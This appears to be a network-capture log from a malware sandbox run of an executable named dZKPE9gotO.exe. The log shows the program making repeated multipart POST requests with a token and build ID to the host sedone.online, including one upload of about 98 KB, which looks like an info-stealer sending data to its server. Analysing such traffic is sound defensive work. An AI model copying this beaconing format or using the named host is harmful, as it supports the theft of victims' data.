                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1; msnup=
2024-12-16 14:40:27 UTC | 9682 | OUT | Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-16T16:07:51.077Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":6,"installId":"84149a19-0249-43fb-89ad-f28da6106f7b","epoch":"118553728"},"app":{"loca
2024-12-16 14:40:27 UTC | 894 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=bc3f0bc32ee742b09752ddef15cbf1f9&HASH=bc3f&LV=202412&V=4&LU=1734360027421; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 14:40:27 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: MS0=4c7a67e324884937830e3e1f1b5fe698; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 15:10:27 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                time-delta-millis: -5243656
                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:27 GMT
                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.7 | 49968 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:27 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----9RIW4ECJ5XBAAI58QIEC
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1837
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:40:27 UTC | 1837 | OUT | Data Ascii: ------9RIW4ECJ5XBAAI58QIECContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------9RIW4ECJ5XBAAI58QIECContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------9RIW4ECJ5XBAAI58QIECCont
2024-12-16 14:40:28 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:28 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.7 | 49971 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:28 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----L6XTRQ1VS0ZM7Q9HD26X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 14:40:28 UTC | 1837 | OUT | Data Ascii:
------L6XTRQ1VS0ZM7Q9HD26X
Content-Disposition: form-data; name="token"

2afa0bd343ad19f9200a181fa83489aa
------L6XTRQ1VS0ZM7Q9HD26X
Content-Disposition: form-data; name="build_id"

e411cf62bcba04d74fc6b505b9235404
------L6XTRQ1VS0ZM7Q9HD26X
Cont
2024-12-16 14:40:29 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 14:40:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 14:40:29 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.7 | 49978 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:30 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----J5F3OPPZC2V3EUS26X4O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 14:40:30 UTC | 1837 | OUT | Data Ascii:
------J5F3OPPZC2V3EUS26X4O
Content-Disposition: form-data; name="token"

2afa0bd343ad19f9200a181fa83489aa
------J5F3OPPZC2V3EUS26X4O
Content-Disposition: form-data; name="build_id"

e411cf62bcba04d74fc6b505b9235404
------J5F3OPPZC2V3EUS26X4O
Cont
2024-12-16 14:40:31 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 14:40:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 14:40:31 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.7 | 49979 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:31 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----L68Y5XTJ5XBAIMOP8G4O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 14:40:31 UTC | 1825 | OUT | Data Ascii:
------L68Y5XTJ5XBAIMOP8G4O
Content-Disposition: form-data; name="token"

2afa0bd343ad19f9200a181fa83489aa
------L68Y5XTJ5XBAIMOP8G4O
Content-Disposition: form-data; name="build_id"

e411cf62bcba04d74fc6b505b9235404
------L68Y5XTJ5XBAIMOP8G4O
Cont
2024-12-16 14:40:32 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 14:40:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 14:40:32 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.7 | 49985 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:33 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----M7Y5PZUKXLNYU3OHDBIM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 14:40:33 UTC | 1837 | OUT | Data Ascii:
------M7Y5PZUKXLNYU3OHDBIM
Content-Disposition: form-data; name="token"

2afa0bd343ad19f9200a181fa83489aa
------M7Y5PZUKXLNYU3OHDBIM
Content-Disposition: form-data; name="build_id"

e411cf62bcba04d74fc6b505b9235404
------M7Y5PZUKXLNYU3OHDBIM
Cont
2024-12-16 14:40:34 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 14:40:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 14:40:34 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                48192.168.2.749991116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:34 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----O8Q168Y5PH47YUK6FU3E
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1825
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:34 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 38 51 31 36 38 59 35 50 48 34 37 59 55 4b 36 46 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 51 31 36 38 59 35 50 48 34 37 59 55 4b 36 46 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 51 31 36 38 59 35 50 48 34 37 59 55 4b 36 46 55 33 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------O8Q168Y5PH47YUK6FU3EContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------O8Q168Y5PH47YUK6FU3EContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------O8Q168Y5PH47YUK6FU3ECont
                                                                                                                                                                                                                                                2024-12-16 14:40:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:35 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:40:35 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.7 | 49995 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:36 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----MYM7YMOHLXBIEUAIMOP8
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1825
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:40:36 UTC | 1825 | OUT
                                                                                                                                                                                                                                                Data Ascii: ------MYM7YMOHLXBIEUAIMOP8Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------MYM7YMOHLXBIEUAIMOP8Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------MYM7YMOHLXBIEUAIMOP8Cont
2024-12-16 14:40:37 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:37 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:40:37 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.7 | 49998 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:37 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----Y5X47Q90HDJMYU3EKN7Q
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1817
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:40:37 UTC | 1817 | OUT
                                                                                                                                                                                                                                                Data Ascii: ------Y5X47Q90HDJMYU3EKN7QContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------Y5X47Q90HDJMYU3EKN7QContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------Y5X47Q90HDJMYU3EKN7QCont
2024-12-16 14:40:38 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:38 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:40:38 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.7 | 50004 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:39 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----TJMOPHD2DTRQIM7Q16X4
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1817
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:40:39 UTC | 1817 | OUT
                                                                                                                                                                                                                                                Data Ascii: ------TJMOPHD2DTRQIM7Q16X4Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------TJMOPHD2DTRQIM7Q16X4Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------TJMOPHD2DTRQIM7Q16X4Cont
2024-12-16 14:40:40 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:40:40 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.7 | 50008 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:40 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----TJMOPHD2DTRQIM7Q16X4
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1817
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:40:40 UTC | 1817 | OUT
                                                                                                                                                                                                                                                Data Ascii: ------TJMOPHD2DTRQIM7Q16X4Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------TJMOPHD2DTRQIM7Q16X4Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------TJMOPHD2DTRQIM7Q16X4Cont
2024-12-16 14:40:41 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:41 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:40:41 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.7 | 50014 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:42 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----3EUA1N7YM7GV37Q1VKX4
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1817
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:40:42 UTC | 1817 | OUT
                                                                                                                                                                                                                                                Data Ascii: ------3EUA1N7YM7GV37Q1VKX4Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------3EUA1N7YM7GV37Q1VKX4Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------3EUA1N7YM7GV37Q1VKX4Cont
                                                                                                                                                                                                                                                2024-12-16 14:40:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:43 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:44 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.7 | 50017 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                2024-12-16 14:40:43 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----J5P8Q9RIE3WBAI5XBSR1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 453
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:43 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 35 50 38 51 39 52 49 45 33 57 42 41 49 35 58 42 53 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 50 38 51 39 52 49 45 33 57 42 41 49 35 58 42 53 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 50 38 51 39 52 49 45 33 57 42 41 49 35 58 42 53 52 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------J5P8Q9RIE3WBAI5XBSR1Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------J5P8Q9RIE3WBAI5XBSR1Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------J5P8Q9RIE3WBAI5XBSR1Cont
                                                                                                                                                                                                                                                2024-12-16 14:40:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:44 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:44 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.7 | 50023 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                2024-12-16 14:40:47 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----H4O8GV3OZMOZMYMG4WTR
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 98221
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:47 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 48 34 4f 38 47 56 33 4f 5a 4d 4f 5a 4d 59 4d 47 34 57 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 48 34 4f 38 47 56 33 4f 5a 4d 4f 5a 4d 59 4d 47 34 57 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 34 4f 38 47 56 33 4f 5a 4d 4f 5a 4d 59 4d 47 34 57 54 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------H4O8GV3OZMOZMYMG4WTRContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------H4O8GV3OZMOZMYMG4WTRContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------H4O8GV3OZMOZMYMG4WTRCont
                                                                                                                                                                                                                                                2024-12-16 14:40:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:48 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.7 | 50034 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                2024-12-16 14:40:50 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FKXBA1N7QIEUAAA1NGVK
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
